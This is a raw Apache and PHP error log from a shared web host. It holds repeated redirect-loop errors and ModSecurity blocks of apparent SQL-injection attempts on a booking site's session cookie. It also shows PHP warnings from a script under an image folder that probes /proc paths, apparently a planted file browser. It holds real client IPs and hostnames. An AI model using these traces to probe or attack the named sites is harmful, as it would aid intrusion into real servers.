[Tue May 12 03:54:29.355409 2026] [core:error] [pid 1707624:tid 1707701] [client 74.249.238.26:40543] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:29.355440 2026] [core:error] [pid 1707624:tid 1707701] [client 74.249.238.26:40543] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:30.786270 2026] [core:error] [pid 1691274:tid 1691293] [client 74.249.238.26:50268] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:30.786316 2026] [core:error] [pid 1691274:tid 1691293] [client 74.249.238.26:50268] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:34.200258 2026] [core:error] [pid 1730207:tid 1730227] [client 74.249.238.26:40546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:34.200287 2026] [core:error] [pid 1730207:tid 1730227] [client 74.249.238.26:40546] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:37.770534 2026] [core:error] [pid 1709071:tid 1709089] [client 74.249.238.26:60409] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:37.770576 2026] [core:error] [pid 1709071:tid 1709089] [client 74.249.238.26:60409] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
PHP Warning:  filesize(): stat failed for /proc/948/task/948/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/948/task/948/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/948/task/948/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/948/task/948/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/948/task/948/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/948/task/948/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:54:46.610078 2026] [core:error] [pid 1709071:tid 1709111] [client 74.249.238.26:40527] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:46.610106 2026] [core:error] [pid 1709071:tid 1709111] [client 74.249.238.26:40527] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:50.577778 2026] [core:error] [pid 1695975:tid 1695983] [client 74.249.238.26:40537] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:50.577811 2026] [core:error] [pid 1695975:tid 1695983] [client 74.249.238.26:40537] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:51.300442 2026] [core:error] [pid 1691274:tid 1691294] [client 74.249.238.26:50275] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:51.300481 2026] [core:error] [pid 1691274:tid 1691294] [client 74.249.238.26:50275] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:52.684815 2026] [core:error] [pid 1707624:tid 1707701] [client 74.249.238.26:50285] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:52.684853 2026] [core:error] [pid 1707624:tid 1707701] [client 74.249.238.26:50285] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:01.376206 2026] [core:error] [pid 1730207:tid 1730223] [client 74.249.238.26:40522] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:01.376241 2026] [core:error] [pid 1730207:tid 1730223] [client 74.249.238.26:40522] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:03.557461 2026] [core:error] [pid 1730207:tid 1730227] [client 74.249.238.26:50294] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:03.557491 2026] [core:error] [pid 1730207:tid 1730227] [client 74.249.238.26:50294] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:05.433878 2026] [core:error] [pid 1695975:tid 1695985] [client 74.249.238.26:50296] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:05.433908 2026] [core:error] [pid 1695975:tid 1695985] [client 74.249.238.26:50296] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:07.779074 2026] [core:error] [pid 1730175:tid 1730179] [client 74.249.238.26:50302] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:07.779108 2026] [core:error] [pid 1730175:tid 1730179] [client 74.249.238.26:50302] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:15.587644 2026] [core:error] [pid 1707624:tid 1707695] [client 74.249.238.26:40535] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:15.587673 2026] [core:error] [pid 1707624:tid 1707695] [client 74.249.238.26:40535] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:19.025201 2026] [core:error] [pid 1730175:tid 1730194] [client 74.249.238.26:50266] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:19.029398 2026] [core:error] [pid 1730175:tid 1730194] [client 74.249.238.26:50266] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:21.861975 2026] [core:error] [pid 1691274:tid 1691288] [client 74.249.238.26:60402] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:21.862009 2026] [core:error] [pid 1691274:tid 1691288] [client 74.249.238.26:60402] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:27.054964 2026] [core:error] [pid 1691274:tid 1691278] [client 74.249.238.26:40525] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:27.054996 2026] [core:error] [pid 1691274:tid 1691278] [client 74.249.238.26:40525] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:32.466816 2026] [core:error] [pid 1730175:tid 1730189] [client 74.249.238.26:50271] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:32.466842 2026] [core:error] [pid 1730175:tid 1730189] [client 74.249.238.26:50271] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:34.079904 2026] [core:error] [pid 1691274:tid 1691286] [client 74.249.238.26:50259] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:34.079943 2026] [core:error] [pid 1691274:tid 1691286] [client 74.249.238.26:50259] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:35.688269 2026] [core:error] [pid 1695975:tid 1695993] [client 74.249.238.26:60374] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:35.688313 2026] [core:error] [pid 1695975:tid 1695993] [client 74.249.238.26:60374] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:36.422847 2026] [core:error] [pid 1730175:tid 1730185] [client 74.249.238.26:50279] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:36.422876 2026] [core:error] [pid 1730175:tid 1730185] [client 74.249.238.26:50279] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:38.909734 2026] [core:error] [pid 1691274:tid 1691296] [client 74.249.238.26:40553] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:38.909766 2026] [core:error] [pid 1691274:tid 1691296] [client 74.249.238.26:40553] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:41.238133 2026] [core:error] [pid 1695975:tid 1695990] [client 74.249.238.26:55572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:41.238167 2026] [core:error] [pid 1695975:tid 1695990] [client 74.249.238.26:55572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:43.389701 2026] [security2:error] [pid 1695975:tid 1695994] [client 43.153.123.3:41080] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.krakoukas.com"] [uri "/"] [unique_id "agKIn9VI9ymHBxup74-fqAAAAJA"], referer: http://www.krakoukas.com
[Tue May 12 03:55:48.982434 2026] [security2:error] [pid 1691274:tid 1691279] [client 43.153.123.3:49190] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/"] [unique_id "agKIpFfdQaraX_prmqcygAAAAAI"], referer: https://www.krakoukas.com/
[Tue May 12 03:55:50.703565 2026] [core:error] [pid 1709071:tid 1709089] [client 74.249.238.26:40514] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:50.703594 2026] [core:error] [pid 1709071:tid 1709089] [client 74.249.238.26:40514] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:51.342256 2026] [security2:error] [pid 1695975:tid 1695978] [client 172.104.186.23:59998] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKIp9VI9ymHBxup74-frwAAAIA"]
[Tue May 12 03:55:51.342472 2026] [security2:error] [pid 1695975:tid 1695978] [client 172.104.186.23:59998] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKIp9VI9ymHBxup74-frwAAAIA"]
[Tue May 12 03:55:52.385613 2026] [core:error] [pid 1707624:tid 1707689] [client 74.249.238.26:40555] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:52.385635 2026] [core:error] [pid 1707624:tid 1707689] [client 74.249.238.26:40555] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:52.532020 2026] [security2:error] [pid 1695975:tid 1695978] [client 172.104.186.23:59998] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKIp9VI9ymHBxup74-frwAAAIA"]
[Tue May 12 03:55:54.316363 2026] [core:error] [pid 1709071:tid 1709098] [client 74.249.238.26:40559] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:54.316394 2026] [core:error] [pid 1709071:tid 1709098] [client 74.249.238.26:40559] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:55.068677 2026] [core:error] [pid 1730175:tid 1730185] [client 74.249.238.26:40549] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:55.068702 2026] [core:error] [pid 1730175:tid 1730185] [client 74.249.238.26:40549] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:56.390539 2026] [core:error] [pid 1695975:tid 1695995] [client 74.249.238.26:60353] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:56.390569 2026] [core:error] [pid 1695975:tid 1695995] [client 74.249.238.26:60353] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:59.066881 2026] [core:error] [pid 1691274:tid 1691284] [client 74.249.238.26:50283] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:55:59.066909 2026] [core:error] [pid 1691274:tid 1691284] [client 74.249.238.26:50283] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
PHP Warning:  filesize(): stat failed for /proc/1718/task/1718/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1718/task/1718/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1718/task/1718/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1718/task/1718/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1718/task/1718/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1718/task/1718/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:56:06.781148 2026] [core:error] [pid 1709071:tid 1709104] [client 74.249.238.26:50243] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:06.781180 2026] [core:error] [pid 1709071:tid 1709104] [client 74.249.238.26:50243] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:07.936195 2026] [core:error] [pid 1730175:tid 1730190] [client 74.249.238.26:60396] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:07.936221 2026] [core:error] [pid 1730175:tid 1730190] [client 74.249.238.26:60396] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:09.154144 2026] [core:error] [pid 1730175:tid 1730191] [client 74.249.238.26:60372] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:09.154175 2026] [core:error] [pid 1730175:tid 1730191] [client 74.249.238.26:60372] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:16.100089 2026] [core:error] [pid 1695975:tid 1695995] [client 74.249.238.26:39140] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:16.100126 2026] [core:error] [pid 1695975:tid 1695995] [client 74.249.238.26:39140] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:17.957958 2026] [core:error] [pid 1695975:tid 1695978] [client 74.249.238.26:40533] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:17.957991 2026] [core:error] [pid 1695975:tid 1695978] [client 74.249.238.26:40533] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:19.644424 2026] [core:error] [pid 1691274:tid 1691282] [client 74.249.238.26:50244] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:19.644447 2026] [core:error] [pid 1691274:tid 1691282] [client 74.249.238.26:50244] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:21.991024 2026] [core:error] [pid 1709071:tid 1709100] [client 74.249.238.26:50286] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:21.991045 2026] [core:error] [pid 1709071:tid 1709100] [client 74.249.238.26:50286] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:23.056019 2026] [core:error] [pid 1730175:tid 1730201] [client 74.249.238.26:40512] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:23.056049 2026] [core:error] [pid 1730175:tid 1730201] [client 74.249.238.26:40512] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:23.547227 2026] [security2:error] [pid 1695975:tid 1695982] [client 172.104.186.23:50920] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/docs"] [unique_id "agKIx9VI9ymHBxup74-f3QAAAIQ"]
[Tue May 12 03:56:23.547452 2026] [security2:error] [pid 1695975:tid 1695982] [client 172.104.186.23:50920] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/docs"] [unique_id "agKIx9VI9ymHBxup74-f3QAAAIQ"]
[Tue May 12 03:56:23.547675 2026] [security2:error] [pid 1695975:tid 1695982] [client 172.104.186.23:50920] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKIx9VI9ymHBxup74-f3QAAAIQ"]
[Tue May 12 03:56:24.462355 2026] [core:error] [pid 1695975:tid 1695987] [client 74.249.238.26:40516] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:24.462381 2026] [core:error] [pid 1695975:tid 1695987] [client 74.249.238.26:40516] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:56:30.885101 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778552751||1778552391"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKIzrvMumyrWMfSu7q94AAAANU"]
[Tue May 12 03:56:30.885327 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKIzrvMumyrWMfSu7q94AAAANU"]
[Tue May 12 03:56:31.465350 2026] [security2:error] [pid 1709071:tid 1709108] [client 172.104.186.23:33366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKIzrvMumyrWMfSu7q94AAAANU"]
